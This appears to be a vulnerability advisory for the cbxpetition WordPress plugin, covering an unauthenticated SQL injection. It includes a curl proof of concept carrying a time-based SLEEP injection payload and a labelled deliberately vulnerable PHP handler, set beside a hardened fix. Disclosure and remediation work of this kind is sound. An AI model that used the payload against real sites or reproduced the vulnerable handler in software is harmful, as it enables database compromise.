The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
1. Create and publish a new petition.
2. Invoke the following curl command, with the nonce in place, to induce a 5-second sleep:

```shell
curl -i 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=cbxpetition_load_more_signs&security=' \
  --data 'petition_id=2133&perpage=30&order=xxxxxxxxx&page=2&orderby=id AND (SELECT 4657 FROM (SELECT(SLEEP(5)))kvyf)'
```
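For context on the fix side, an added example (not the plugin's own code) shows a "load more signatures" AJAX handler written the vulnerable way the advisory describes, next to a hardened version: the `orderby`/`order` values are restricted to an allow-list (identifiers cannot be bound with `$wpdb->prepare()`), numeric inputs are cast and bound, and the request is tied to a nonce. Function, table, column and nonce action names are hypothetical.

```php
<?php
// Added example, not the plugin's code. Table/column/nonce names are hypothetical.

// VULNERABLE: request parameters are concatenated straight into the SQL string.
// Because the action is also reachable without authentication, any visitor can
// supply "orderby=id AND (SELECT ... SLEEP(5) ...)" and control the query.
function cbx_load_more_signs_vulnerable() {
    global $wpdb;
    $petition_id = $_POST['petition_id'];
    $orderby     = $_POST['orderby'];   // attacker-controlled, unsanitized
    $order       = $_POST['order'];
    $perpage     = $_POST['perpage'];
    $page        = $_POST['page'];
    $offset      = ( $page - 1 ) * $perpage;
    $sql = "SELECT * FROM {$wpdb->prefix}cbxpetition_signs WHERE petition_id = $petition_id "
         . "ORDER BY $orderby $order LIMIT $perpage OFFSET $offset";
    wp_send_json( $wpdb->get_results( $sql ) );
}

// HARDENED: ORDER BY column and direction come from an allow-list, numbers are
// cast with absint() and bound via prepare(), and a nonce is enforced.
function cbx_load_more_signs_hardened() {
    global $wpdb;
    check_ajax_referer( 'cbxpetition_nonce', 'security' ); // dies on a missing/invalid nonce

    $allowed_cols = array( 'id', 'date_created', 'f_name' );
    $orderby = isset( $_POST['orderby'] ) ? sanitize_key( $_POST['orderby'] ) : 'id';
    if ( ! in_array( $orderby, $allowed_cols, true ) ) {
        $orderby = 'id';                // anything outside the allow-list falls back
    }
    $order = ( isset( $_POST['order'] ) && strtoupper( $_POST['order'] ) === 'ASC' ) ? 'ASC' : 'DESC';

    $petition_id = absint( $_POST['petition_id'] ?? 0 );
    $perpage     = min( max( absint( $_POST['perpage'] ?? 30 ), 1 ), 100 ); // bound page size
    $page        = max( absint( $_POST['page'] ?? 1 ), 1 );
    $offset      = ( $page - 1 ) * $perpage;

    // $orderby and $order are now fixed literals from the allow-list; all
    // user-derived numbers are bound as %d placeholders.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}cbxpetition_signs WHERE petition_id = %d "
        . "ORDER BY $orderby $order LIMIT %d OFFSET %d",
        $petition_id, $perpage, $offset
    );
    wp_send_json( $wpdb->get_results( $sql ) );
}
```

With the hardened handler, the advisory's payload in `orderby` is reduced to the literal `id` before it ever reaches the query, so the injected `SLEEP(5)` subquery is never executed.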
CPE

| Name | Operator | Version |
|---|---|---|
| cbxpetition | eq | * |